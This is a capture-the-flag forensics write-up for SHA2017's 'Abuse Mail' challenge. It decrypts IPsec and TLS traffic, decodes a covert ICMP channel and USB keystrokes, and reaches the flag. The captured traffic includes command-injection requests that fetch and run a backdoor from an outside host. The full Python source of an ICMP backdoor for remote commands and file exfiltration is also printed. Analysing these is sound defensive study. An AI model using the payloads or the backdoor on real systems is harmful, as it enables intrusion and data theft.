
SHA2017 CTF - Abuse Mail (Network 300)

Challenge statement:

Our abuse desk received an email that someone from our network has hacked their company. With their help we found some suspected traffic in our network logs, but we can't find what exactly has happened. Can you help us to catch the culprit?

Files:

abuse01.pcap
abuse02.pcap
abuse03.pcap

Solution:

We start by opening the three captures to see what they contain. abuse01 contains TELNET and IPsec traffic; abuse02 and abuse03 contain ICMP traffic.

Let's leave abuse02 and abuse03 aside for now.
Following the TELNET TCP stream, we can see an IPsec configuration being displayed:

root@vpn1:~# ip xfrm state
src 10.11.0.1 dst 10.11.0.83
	proto esp spi 0xce9b2ab8 reqid 1 mode tunnel
	replay-window 32 flag af-unspec
	auth-trunc hmac(sha1) 0x17f298179ebf35a4fa12d5d2c3f3b0466f435282 96
	enc cbc(aes) 0xfb59dc471ca7f58beb30cd0d1bcbb83d6bc0fe76bca7e92bf5c0e455b23e4fe4
	encap type espinudp sport 4500 dport 4500 addr 0.0.0.0
	anti-replay context: seq 0x0, oseq 0xd, bitmap 0x00000000
src 10.11.0.83 dst 10.11.0.1
	proto esp spi 0xcaa4cf43 reqid 1 mode tunnel
	replay-window 32 flag af-unspec
	auth-trunc hmac(sha1) 0xab7271cc8e3d0c403ed75323f8f8f582c784e821 96
	enc cbc(aes) 0x28fcaa9d777f940fac57e1be15477f5f074547b6a723df9243b0eb06bdd74619
	encap type espinudp sport 4500 dport 4500 addr 0.0.0.0
	anti-replay context: seq 0xd, oseq 0x0, bitmap 0x00001fff

Let's try to decrypt the IPsec traffic with these parameters.

It works: we get HTTP traffic.
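Added example, not code from the original writeup: a small parser that turns the ip xfrm state dump shown above into the parameters a decryptor needs (SPI, cipher and key size derived from the key length, truncated HMAC, NAT-T encapsulation). The Wireshark label strings in ENC_LABELS and AUTH_LABELS are assumed to match the names in its ESP SA preference table.

```python
import re

# The two SAs exactly as the telnet session above shows them (values from the
# capture itself, not constructed).
XFRM_STATE = """\
src 10.11.0.1 dst 10.11.0.83
    proto esp spi 0xce9b2ab8 reqid 1 mode tunnel
    replay-window 32 flag af-unspec
    auth-trunc hmac(sha1) 0x17f298179ebf35a4fa12d5d2c3f3b0466f435282 96
    enc cbc(aes) 0xfb59dc471ca7f58beb30cd0d1bcbb83d6bc0fe76bca7e92bf5c0e455b23e4fe4
    encap type espinudp sport 4500 dport 4500 addr 0.0.0.0
    anti-replay context: seq 0x0, oseq 0xd, bitmap 0x00000000
src 10.11.0.83 dst 10.11.0.1
    proto esp spi 0xcaa4cf43 reqid 1 mode tunnel
    replay-window 32 flag af-unspec
    auth-trunc hmac(sha1) 0xab7271cc8e3d0c403ed75323f8f8f582c784e821 96
    enc cbc(aes) 0x28fcaa9d777f940fac57e1be15477f5f074547b6a723df9243b0eb06bdd74619
    encap type espinudp sport 4500 dport 4500 addr 0.0.0.0
    anti-replay context: seq 0xd, oseq 0x0, bitmap 0x00001fff
"""

def parse_xfrm_state(text):
    """Parse 'ip xfrm state' output into one dict per security association (SA)."""
    sas, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"^src (\S+) dst (\S+)$", line)
        if m:                       # a new SA starts; the indented lines below belong to it
            cur = {"src": m.group(1), "dst": m.group(2)}
            sas.append(cur)
            continue
        if cur is None:
            continue
        m = re.match(r"^proto (\w+) spi (0x[0-9a-fA-F]+) reqid (\d+) mode (\w+)", line)
        if m:
            cur.update(proto=m.group(1), spi=int(m.group(2), 16),
                       reqid=int(m.group(3)), mode=m.group(4))
            continue
        m = re.match(r"^auth-trunc (\S+) 0x([0-9a-fA-F]+) (\d+)$", line)
        if m:                       # trailing number = ICV length in bits (96 here)
            cur.update(auth_algo=m.group(1), auth_key=bytes.fromhex(m.group(2)),
                       icv_bits=int(m.group(3)))
            continue
        m = re.match(r"^enc (\S+) 0x([0-9a-fA-F]+)$", line)
        if m:
            cur.update(enc_algo=m.group(1), enc_key=bytes.fromhex(m.group(2)))
            continue
        m = re.match(r"^encap type (\S+) sport (\d+) dport (\d+)", line)
        if m:                       # espinudp = ESP carried in UDP (NAT-T, RFC 3948)
            cur.update(encap=m.group(1), sport=int(m.group(2)), dport=int(m.group(3)))
    return sas

# Labels as they appear in Wireshark's ESP SA preference table (assumed here);
# the AES key size is not part of the label, Wireshark infers it from the key.
ENC_LABELS = {"cbc(aes)": "AES-CBC [RFC3602]"}
AUTH_LABELS = {("hmac(sha1)", 96): "HMAC-SHA-1-96 [RFC2404]"}

def wireshark_esp_sa(sa):
    """Translate one parsed SA into the fields of an ESP SA table entry."""
    if sa.get("proto") != "esp":
        raise ValueError("only ESP SAs carry the encrypted payload")
    key_bits = len(sa["enc_key"]) * 8
    if sa["enc_algo"] == "cbc(aes)" and key_bits not in (128, 192, 256):
        raise ValueError("AES key must be 128/192/256 bits, got %d" % key_bits)
    return {
        "protocol": "IPv4", "src": sa["src"], "dst": sa["dst"],
        "spi": "0x%08x" % sa["spi"],
        "encryption": ENC_LABELS[sa["enc_algo"]],
        "encryption_key": "0x" + sa["enc_key"].hex(),
        "authentication": AUTH_LABELS[(sa["auth_algo"], sa["icv_bits"])],
        "authentication_key": "0x" + sa["auth_key"].hex(),
        "cipher": "aes-%d-cbc" % key_bits,
        # With espinudp the ESP header sits inside UDP/4500, so the dissector
        # must look for ESP there (Wireshark's UDPENCAP dissector handles 4500).
        "udp_encapsulated": sa.get("encap") == "espinudp",
    }

if __name__ == "__main__":
    for sa in parse_xfrm_state(XFRM_STATE):
        print(wireshark_esp_sa(sa))
```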

Following the HTTP stream, we see that a suspicious script is downloaded and then executed through the ip parameter (%3B is a URL-encoded ';', i.e. command injection):

GET /?ip=%3Bwget%20http://10.5.5.207/backdoor.py%20-O%20/tmp/backdoor.py HTTP/1.1
Host: 10.29.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

GET /?ip=%3Bcat%20/tmp/backdoor.py HTTP/1.1
Host: 10.29.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

GET /?ip=%3Bnohup%20sudo%20python%20/tmp/backdoor.py%20K8djhaIU8H2d1jNb%20\& HTTP/1.1
Host: 10.29.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

We extract the script (Export HTTP Objects):

#!/usr/bin/env python

import base64
import sys
import time
import subprocess
import threading

from Crypto import Random
from Crypto.Cipher import AES
from scapy.all import *

BS = 16
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s : s[0:-ord(s[-1])]
magic = "SHA2017"


class AESCipher:

    def __init__( self, key ):
        self.key = key

    def encrypt( self, raw ):
        raw = pad(raw)
        iv = Random.new().read( AES.block_size )
        cipher = AES.new( self.key, AES.MODE_CBC, iv )
        return base64.b64encode( iv + cipher.encrypt( raw ) )

    def decrypt( self, enc ):
        enc = base64.b64decode(enc)
        iv = enc[:16]
        cipher = AES.new(self.key, AES.MODE_CBC, iv )
        return unpad(cipher.decrypt( enc[16:] ))

def run_command(cmd):
    ps = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
    output = ps.communicate()[0]
    return output

def send_ping(host, magic, data):
    data = cipher.encrypt(data)
    load = "{}:{}".format(magic, data)
    time.sleep(1)
    sr(IP(dst=host)/ICMP()/load, timeout=1, verbose=0)

def chunks(L, n):
    for i in xrange(0, len(L), n):
        yield L[i:i+n]

def get_file(host, magic, fn):
    time.sleep(1)
    data = base64.urlsafe_b64encode(open(fn, "rb").read())
    cnt = 0
    icmp_threads = []
    for line in chunks(data, 500):
        t = threading.Thread(target = send_ping, args = (host,magic, "getfile:{}:{}".format(cnt,line)))
        t.daemon = True
        t.start()
        icmp_threads.append(t)
        cnt += 1

    for t in icmp_threads:
        t.join()


cipher = AESCipher(sys.argv[1])

while True:
    try: 
        pkts = sniff(filter="icmp", timeout =5,count=1)

        for packet in pkts:
             if  str(packet.getlayer(ICMP).type) == "8": 
                input = packet[IP].load
                if input[0:len(magic)] == magic:
                    input = input.split(":")
                    data = cipher.decrypt(input[1]).split(":")
                    ip = packet[IP].src
                    if data[0] == "command":
                        output = run_command(data[1])
                        send_ping(ip, magic, "command:{}".format(output))
                    if data[0] == "getfile":
                        #print "[+] Sending file {}".format(data[1])
                        get_file(ip, magic, data[1])
    except:
        pass

This script carries commands and files, AES-encrypted, inside the ICMP payload (each message is prefixed with the magic string SHA2017). So let's turn to abuse02 and abuse03.
We modify the script as follows:

#pkts = sniff(filter="icmp", timeout =5,count=1)
pkts = rdpcap('abuse02.pcap')

data = cipher.decrypt(input[1]).split(":")
print data

We then run the script with the argument found in the HTTP traffic of abuse01, which the script uses as its AES key:

python backdoor.py K8djhaIU8H2d1jNb

We get the following output:

['command', 'ls -la']
['command', 'total 16\ndrwxr-xr-x 3 root     root     4096 Jul 26 09', '36 .\ndrwxr-xr-x 3 root     root     4096 Jul 26 03', '45 ..\ndrwxr-x--- 2 www-data www-data 4096 Jul 26 09', '37 css\n-rwxr-xr-x 1 www-data www-data 1664 Jul 26 04', '46 index.php\n']
['command', 'id']
['command', 'uid=0(root) gid=0(root) groups=0(root)\n']
['command', 'id']
['command', 'uid=0(root) gid=0(root) groups=0(root)\n']
['command', 'id']
['command', 'uid=0(root) gid=0(root) groups=0(root)\n']
['command', 'ls -la /root']
['command', 'total 32\ndrwx------  5 root root 4096 Jul 27 07', '27 .\ndrwxr-xr-x 22 root root 4096 Apr 18 05', '43 ..\n-rw-------  1 root root 3228 Jul 26 06', '44 .bash_history\n-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc\ndrwxr-xr-x  2 root root 4096 Jul 27 09', '11 certs\ndrwxr-xr-x  2 root root 4096 Jul 26 03', '47 .nano\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\ndrwx------  2 root root 4096 Jul 27 07', '27 .ssh\n']
['command', 'ls -la /root/certs']
['command', 'total 16\ndrwxr-xr-x 2 root root 4096 Jul 27 09', '11 .\ndrwx------ 5 root root 4096 Jul 27 07', '27 ..\n-rw-r--r-- 1 root root  989 Jul 27 07', '23 intranet.crt\n-rw-r--r-- 1 root root  916 Jul 27 07', '23 intranet.key\n']
['command', 'cat /root/certs/intranet.crt']
['command', '-----BEGIN CERTIFICATE-----\nMIICrDCCAhWgAwIBAgIJALfe3aETCSTsMA0GCSqGSIb3DQEBCwUAMG8xCzAJBgNV\nBAYTAk5MMRIwEAYDVQQIDAlGbGV2b2xhbmQxETAPBgNVBAcMCFplZXdvbGRlMRQw\nEgYDVQQKDAtTSEEyMDE3IENURjEjMCEGCSqGSIb3DQEJARYUc2hhMjAxN2N0ZkBn\nbWFpbC5jb20wHhcNMTcwNzI3MTQyMzIwWhcNMTgwNzI3MTQyMzIwWjBvMQswCQYD\nVQQGEwJOTDESMBAGA1UECAwJRmxldm9sYW5kMREwDwYDVQQHDAhaZWV3b2xkZTEU\nMBIGA1UECgwLU0hBMjAxNyBDVEYxIzAhBgkqhkiG9w0BCQEWFHNoYTIwMTdjdGZA\nZ21haWwuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC+H/mwETvdjGRn\nn/33zsjMOyPsg5xgSCsLDTg9D8XaeGp7ZQ1habE+9G0gabrKYntVburjitcuheXK\nhCo6nYWF2pSch4WjhNhCxkM++UeKRUv8xYAtSGl+6vvSrwogR+BfRuxZFAeJzvgK\nhNwL7sdW2CJ7Gk89pET/W6AOBNcDWwIDAQABo1AwTjAdBgNVHQ4EFgQUFeykHO7M\nV70l0IO87/3ogRb5VxMwHwYDVR0jBBgwFoAUFeykHO7MV70l0IO87/3ogRb5VxMw\nDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOBgQCITumB4q5A+Lu9EzUe1qAW\nrjAeVfXq/qVrw+byH4VqNuEOBQ7lq151VbsXI1YQXCxVbP/r5Zxb1BfS/3qHHFDu\nSRqYaxh9c+BRkdAdzkFebMbIocnaLuVFpn237Z/ysSt0PPrTaI3gUSoz/7gXB+nX\nDkYKgl7BR0a72yTuLAc0GA==\n-----END CERTIFICATE-----\n']
['command', 'cat /root/certs/intranet.key']
['command', '-----BEGIN PRIVATE KEY-----\nMIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBAL4f+bARO92MZGef\n/ffOyMw7I+yDnGBIKwsNOD0Pxdp4antlDWFpsT70bSBpuspie1Vu6uOK1y6F5cqE\nKjqdhYXalJyHhaOE2ELGQz75R4pFS/zFgC1IaX7q+9KvCiBH4F9G7FkUB4nO+AqE\n3Avux1bYInsaTz2kRP9boA4E1wNbAgMBAAECgYEAiYU/aedNUhc2mO3VGeXswC0W\n8wDPn6UT3U6WmzRJfJkVDGQvpYJ5vnu2Y3eWsMVDSKyOIkBPHUukxzOKCBPge449\nkMwW8cX0nHSGFl1HsYiY14Lr/BiOXz/c+I9Yg+Bexf5kCTYAjzqZ1ZErrIQvagNE\npXb1GGZrnrU7wH9FI8ECQQDhwEnscmqsnPr43E0eFUy3OybfQfo+mSRdq84zwHoW\nBofTUUOpDZpZhIWt6JsdsSqqYVt+W8XHqILraK/EQDnpAkEA15mi7tjozljGcjVP\ndYzB4m24vRK4guujNSJDXKwoDvjDI8x3iu/iTtfxkM3Swko4bxWwiUB7MOaCLgQO\nHaaEowJAXIzswZcWzLV+3s/SfebVkLkbcqQl58v48L4ix2y9oJIE1UmXp5MAGHsQ\nIwAdt8qOZ1OKov8U0onvQnuks5xxIQJBAMwBz5/MVfYzIIwfD7H+X9Pe2Ojn1vni\n+IslgbImIL2R/CxapF8uf+j1AtpvN9eqnV3XmzU0c50g8NuT8LtzvpsCQGUArCoa\nps7xk/SxGfz3IBrsUIOn3Iqh9wqoLfu7wVuc+LFIwkrNm6D5ZnzUapvO2oqj+5ER\niuSWkHY6ll1V1m0=\n-----END PRIVATE KEY-----\n']
['command', 'cat /root/certs/intranet.key']
['command', '-----BEGIN PRIVATE KEY-----\nMIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBAL4f+bARO92MZGef\n/ffOyMw7I+yDnGBIKwsNOD0Pxdp4antlDWFpsT70bSBpuspie1Vu6uOK1y6F5cqE\nKjqdhYXalJyHhaOE2ELGQz75R4pFS/zFgC1IaX7q+9KvCiBH4F9G7FkUB4nO+AqE\n3Avux1bYInsaTz2kRP9boA4E1wNbAgMBAAECgYEAiYU/aedNUhc2mO3VGeXswC0W\n8wDPn6UT3U6WmzRJfJkVDGQvpYJ5vnu2Y3eWsMVDSKyOIkBPHUukxzOKCBPge449\nkMwW8cX0nHSGFl1HsYiY14Lr/BiOXz/c+I9Yg+Bexf5kCTYAjzqZ1ZErrIQvagNE\npXb1GGZrnrU7wH9FI8ECQQDhwEnscmqsnPr43E0eFUy3OybfQfo+mSRdq84zwHoW\nBofTUUOpDZpZhIWt6JsdsSqqYVt+W8XHqILraK/EQDnpAkEA15mi7tjozljGcjVP\ndYzB4m24vRK4guujNSJDXKwoDvjDI8x3iu/iTtfxkM3Swko4bxWwiUB7MOaCLgQO\nHaaEowJAXIzswZcWzLV+3s/SfebVkLkbcqQl58v48L4ix2y9oJIE1UmXp5MAGHsQ\nIwAdt8qOZ1OKov8U0onvQnuks5xxIQJBAMwBz5/MVfYzIIwfD7H+X9Pe2Ojn1vni\n+IslgbImIL2R/CxapF8uf+j1AtpvN9eqnV3XmzU0c50g8NuT8LtzvpsCQGUArCoa\nps7xk/SxGfz3IBrsUIOn3Iqh9wqoLfu7wVuc+LFIwkrNm6D5ZnzUapvO2oqj+5ER\niuSWkHY6ll1V1m0=\n-----END PRIVATE KEY-----\n']
['command', 'cat /etc/hosts']
['command', '127.0.0.1\tlocalhost\n127.0.1.1\tubuntu\n\n# The following lines are desirable for IPv6 capable hosts\n', '', '1     localhost ip6-localhost ip6-loopback\nff02', '', '1 ip6-allnodes\nff02', '', '2 ip6-allrouters\n10.29.0.1\trouter\n192.168.1.1     router\n192.168.1.2     intranet\n']
['command', 'nohup nmap intranet > /tmp/intranet.nmap']
['command', '']
['command', 'cat /tmp/intranet.nmap']
['command', '\nStarting Nmap 7.01 ( https', '//nmap.org ) at 2017-07-27 09', '48 PDT\nNmap scan report for intranet (192.168.1.2)\nHost is up (0.00010s latency).\nNot shown', ' 997 closed ports\nPORT    STATE SERVICE\n22/tcp  open  ssh\n80/tcp  open  http\n443/tcp open  https\nMAC Address', ' 00', '0C', '29', '3D', 'FD', 'B0 (VMware)\n\nNmap done', ' 1 IP address (1 host up) scanned in 1.52 seconds\n']
['command', 'cat /tmp/intranet.nmap']
['command', '\nStarting Nmap 7.01 ( https', '//nmap.org ) at 2017-07-27 09', '48 PDT\nNmap scan report for intranet (192.168.1.2)\nHost is up (0.00010s latency).\nNot shown', ' 997 closed ports\nPORT    STATE SERVICE\n22/tcp  open  ssh\n80/tcp  open  http\n443/tcp open  https\nMAC Address', ' 00', '0C', '29', '3D', 'FD', 'B0 (VMware)\n\nNmap done', ' 1 IP address (1 host up) scanned in 1.52 seconds\n']
['command', 'cat /tmp/intranet.nmap']
['command', '\nStarting Nmap 7.01 ( https', '//nmap.org ) at 2017-07-27 09', '48 PDT\nNmap scan report for intranet (192.168.1.2)\nHost is up (0.00010s latency).\nNot shown', ' 997 closed ports\nPORT    STATE SERVICE\n22/tcp  open  ssh\n80/tcp  open  http\n443/tcp open  https\nMAC Address', ' 00', '0C', '29', '3D', 'FD', 'B0 (VMware)\n\nNmap done', ' 1 IP address (1 host up) scanned in 1.52 seconds\n']
['command', 'cat /tmp/intranet.nmap']
['command', '\nStarting Nmap 7.01 ( https', '//nmap.org ) at 2017-07-27 09', '48 PDT\nNmap scan report for intranet (192.168.1.2)\nHost is up (0.00010s latency).\nNot shown', ' 997 closed ports\nPORT    STATE SERVICE\n22/tcp  open  ssh\n80/tcp  open  http\n443/tcp open  https\nMAC Address', ' 00', '0C', '29', '3D', 'FD', 'B0 (VMware)\n\nNmap done', ' 1 IP address (1 host up) scanned in 1.52 seconds\n']
['command', 'curl -k https', '//intranet/']
['command', '  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n\r  0     0    0     0    0     0      0      0 --', '--', '-- --', '--', '-- --', '--', '--     0\r100   456  100   456    0     0   4871      0 --', '--', '-- --', '--', '-- --', '--', '--  4903\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>401 Unauthorized</title>\n</head><body>\n<h1>Unauthorized</h1>\n<p>This server could not verify that you\nare authorized to access the document\nrequested.  Either you supplied the wrong\ncredentials (e.g., bad password), or your\nbrowser doesn\'t understand how to supply\nthe credentials required.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at intranet Port 443</address>\n</body></html>\n']
['command', 'tcpdump -D']
['command', '1.ens33 [Up, Running]\n2.ens39 [Up, Running]\n3.any (Pseudo-device that captures on all interfaces) [Up, Running]\n4.lo [Up, Running, Loopback]\n5.nflog (Linux netfilter log (NFLOG) interface)\n6.nfqueue (Linux netfilter queue (NFQUEUE) interface)\n7.usbmon1 (USB bus number 1)\n8.usbmon2 (USB bus number 2)\n']
['command', 'tcpdump -i usbmon2 -w /tmp/usb.pcap']
['command', 'tcpdump host intranet -w /tmp/intranet.pcap']

We set the private key aside, it will probably be useful later.
We also note the two tcpdump commands at the end.

['getfile', '/tmp/intranet.pcap']
...
['getfile', '/tmp/usb.pcap']
...

We reorder the getfile chunks (each one carries an index and a piece of the base64 text) and rebuild the two files.
intranet.pcap contains TLS traffic.
usb.pcap contains a USB keyboard capture.
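Added example, not code from the writeup or from the backdoor: it takes already-decrypted backdoor messages (the AES layer is handled by the modified backdoor script above) and shows how to split them without the truncation visible in the output above (the backdoor splits on every ':', which is why 'Jul 26 09:36' came out in pieces), and how to reorder and decode the getfile chunks back into a file. The sample capture file and the messages are constructed in the block.

```python
import base64
import random
import struct

PCAP_MAGICS = (b"\xd4\xc3\xb2\xa1", b"\xa1\xb2\xc3\xd4",   # pcap, microsecond timestamps
               b"\x4d\x3c\xb2\xa1", b"\xa1\xb2\x3c\x4d")   # pcap, nanosecond timestamps

def parse_message(plaintext):
    """Split a decrypted backdoor message into its fields.

    Messages are 'command:<text>', 'getfile:<path>' (announcement) or
    'getfile:<index>:<base64 chunk>', so at most two ':' are structural;
    anything after them is payload and may itself contain colons.
    """
    kind, sep, rest = plaintext.partition(":")
    if not sep:
        raise ValueError("no message type in %r" % plaintext[:20])
    if kind == "command":
        return ("command", rest)
    if kind == "getfile":
        index, sep2, chunk = rest.partition(":")
        if sep2 and index.isdigit():
            return ("chunk", int(index), chunk)
        return ("announce", rest)
    raise ValueError("unknown message type %r" % kind)

def reassemble_file(messages):
    """Rebuild the exfiltrated file from its getfile chunks, in any order.

    The backdoor base64-encodes the whole file, cuts the text into 500-byte
    pieces and sends each one from its own thread, so chunks arrive out of
    order. A gap in the index sequence would silently corrupt the file, so
    it is reported as an error instead.
    """
    chunks = {}
    for msg in messages:
        parsed = parse_message(msg)
        if parsed[0] == "chunk":
            chunks[parsed[1]] = parsed[2]
    if not chunks:
        raise ValueError("no getfile chunks in the messages")
    count = max(chunks) + 1
    missing = [i for i in range(count) if i not in chunks]
    if missing:
        raise ValueError("missing chunk indexes: %s" % missing)
    return base64.urlsafe_b64decode("".join(chunks[i] for i in range(count)))

def looks_like_pcap(data):
    """Quick sanity check on a rebuilt file: does it start with a pcap magic?"""
    return data[:4] in PCAP_MAGICS

# --- constructed sample: a fake capture file sent through the protocol ---
def make_sample_capture():
    header = struct.pack("<IHHiIII", 0xa1b2c3d4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    return header + bytes(range(256)) * 5           # 1280 bytes of filler "packet data"

def make_sample_messages(data, chunk_size=500, seed=7):
    text = base64.urlsafe_b64encode(data).decode()
    pieces = [text[i:i + chunk_size] for i in range(0, len(text), chunk_size)]
    msgs = ["getfile:/tmp/intranet.pcap"]
    msgs += ["getfile:%d:%s" % (i, p) for i, p in enumerate(pieces)]
    random.Random(seed).shuffle(msgs)               # simulate out-of-order arrival
    return msgs

if __name__ == "__main__":
    original = make_sample_capture()
    rebuilt = reassemble_file(make_sample_messages(original))
    print(rebuilt == original, looks_like_pcap(rebuilt), len(rebuilt))
```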

We decrypt the TLS traffic with the private key recovered earlier and obtain a password-protected archive, secret.zip.

Then, with the following script, we extract the keystrokes:

# tshark -r usb.pcap -T fields -e usb.capdata | cut -d ':' -f 1-3 | sed -e "s/00:00:00//g" | sed -e "s/02:00:/20/g" | sed -e "s/00:00:/00/g" | sed -e "s/2000//g" > keys.txt
#
# Each HID report is 8 bytes: modifier, reserved, then up to six keys. The pipeline
# keeps the first three bytes, drops empty reports (00:00:00), folds the left-shift
# modifier (02) into a "20" prefix and drops shift-only reports (2000), so every
# line of keys.txt is a 4-hex-digit "<modifier><keycode>" value.

# "20xx": key xx typed with shift held; "00xx": key xx typed without shift.
mappings = {
    '2004': 'A', '2005': 'B', '2006': 'C', '2007': 'D', '2008': 'E', '2009': 'F', '200a': 'G', '200b': 'H',
    '200c': 'I', '200d': 'J', '200e': 'K', '200f': 'L', '2010': 'M', '2011': 'N', '2012': 'O', '2013': 'P',
    '2014': 'Q', '2015': 'R', '2016': 'S', '2017': 'T', '2018': 'U', '2019': 'V', '201a': 'W', '201b': 'X',
    '201c': 'Y', '201d': 'Z', '201e': '!', '201f': '@', '2020': '#', '2021': '$', '2022': '%', '2023': '^',
    '2024': '&', '2025': '*', '2026': '(', '2027': ')', '202d': '_', '202e': '+', '202f': '{', '2030': '}',
    '2031': '|', '2033': ':', '2034': '"', '2035': '~', '2036': '<', '2037': '>', '2038': '?',
    '0004': 'a', '0005': 'b', '0006': 'c', '0007': 'd', '0008': 'e', '0009': 'f', '000a': 'g', '000b': 'h',
    '000c': 'i', '000d': 'j', '000e': 'k', '000f': 'l', '0010': 'm', '0011': 'n', '0012': 'o', '0013': 'p',
    '0014': 'q', '0015': 'r', '0016': 's', '0017': 't', '0018': 'u', '0019': 'v', '001a': 'w', '001b': 'x',
    '001c': 'y', '001d': 'z', '001e': '1', '001f': '2', '0020': '3', '0021': '4', '0022': '5', '0023': '6',
    '0024': '7', '0025': '8', '0026': '9', '0027': '0', '0028': '\n', '002c': ' ', '002d': '-', '002e': '=',
    '002f': '[', '0030': ']', '0031': '\\', '0033': ';', '0034': "'", '0035': '`', '0036': ',', '0037': '.',
    '0038': '/',
}

with open('keys.txt') as keys:
    nums = [line.strip() for line in keys if line.strip() != '']

output = ""
for n in nums:
    if n in mappings:
        output += mappings[n]
    else:
        output += 'x'   # report not in the table (e.g. a control key) is shown as x

print('Unmapped keys are shown as x:\n\n' + output)

Decoded keystrokes:
root
Welcome123
ls -la
curl -ks https://root:Welcome123@intranet/secret.zip
unzip secret.zip
Pyj4m4P4rtY@2017
cat secret.txt
display hamburgx
xlogoout
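Added example, not part of the original writeup: a decoder that reads tshark's usb.capdata lines directly instead of going through the sed pipeline, and goes a bit beyond it: it honours both shift modifiers, all six key slots of a report, does not double a key that stays held across polls, and keeps backspace and unmapped keys visible. The sample reports are constructed in the block.

```python
import re

# USB HID boot-keyboard report: byte 0 modifier bitmap, byte 1 reserved,
# bytes 2..7 usage IDs of the keys currently held (0 = none).
LEFT_SHIFT, RIGHT_SHIFT = 0x02, 0x20
LETTERS = "abcdefghijklmnopqrstuvwxyz"                  # usage IDs 0x04..0x1d
DIGITS, DIGITS_SHIFTED = "1234567890", "!@#$%^&*()"      # usage IDs 0x1e..0x27
PUNCT = {0x2c: (" ", " "), 0x2d: ("-", "_"), 0x2e: ("=", "+"), 0x2f: ("[", "{"),
         0x30: ("]", "}"), 0x31: ("\\", "|"), 0x33: (";", ":"), 0x34: ("'", '"'),
         0x35: ("`", "~"), 0x36: (",", "<"), 0x37: (".", ">"), 0x38: ("/", "?")}
CONTROL = {0x28: "\n", 0x29: "<ESC>", 0x2a: "<BS>", 0x2b: "\t"}

def usage_to_char(usage, shifted):
    """Map one usage ID to text (US layout); unknown IDs stay visible as <xx>."""
    if 0x04 <= usage <= 0x1d:
        ch = LETTERS[usage - 0x04]
        return ch.upper() if shifted else ch
    if 0x1e <= usage <= 0x27:
        return (DIGITS_SHIFTED if shifted else DIGITS)[usage - 0x1e]
    if usage in PUNCT:
        return PUNCT[usage][1 if shifted else 0]
    if usage in CONTROL:
        return CONTROL[usage]
    return "<%02x>" % usage

def decode_reports(lines):
    """Turn tshark's usb.capdata lines ("02:00:04:00:00:00:00:00") into typed text.

    A key produces one character when it first shows up in a report and is
    ignored while it stays held in the following reports, so repeated polls of
    the same key are not doubled.
    """
    typed, held = [], set()
    for line in lines:
        line = line.strip()
        if not line:
            continue
        report = bytes.fromhex(line.replace(":", ""))
        if len(report) < 8:
            continue            # not a boot-keyboard report (or a truncated one)
        shifted = bool(report[0] & (LEFT_SHIFT | RIGHT_SHIFT))
        keys = [u for u in report[2:8] if u]
        for usage in keys:
            if usage not in held:
                typed.append(usage_to_char(usage, shifted))
        held = set(keys)
    return "".join(typed)

def apply_backspaces(text):
    """Resolve <BS> markers the way a terminal would: delete the previous character."""
    out = []
    for token in re.split(r"(<BS>)", text):
        if token == "<BS>":
            if out:
                out.pop()
        else:
            out.extend(token)
    return "".join(out)

def report(usage, modifier=0):
    """Build one 8-byte report in tshark's colon-separated hex form (constructed)."""
    return "%02x:00:%02x:00:00:00:00:00" % (modifier, usage)

RELEASE = report(0)
# Constructed sample: "ls -la", Enter, then a capital W typed with right shift;
# the first "l" is polled twice while held.
SAMPLE_REPORTS = [report(0x0f), report(0x0f), RELEASE, report(0x16), RELEASE,
                  report(0x2c), RELEASE, report(0x2d), RELEASE, report(0x0f), RELEASE,
                  report(0x04), RELEASE, report(0x28), RELEASE,
                  report(0, RIGHT_SHIFT), report(0x1a, RIGHT_SHIFT),
                  report(0, RIGHT_SHIFT), RELEASE]

if __name__ == "__main__":
    print(repr(apply_backspaces(decode_reports(SAMPLE_REPORTS))))
```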

With this information, all that remains is to extract secret.zip and grab the flag! :D

$ cat secret.txt 
Important passwords:
secret.zip	Pyj4m4P4rtY@2017
root		Welcome123
flag	        flag{bf107b7f64f320034df7e48669439f69}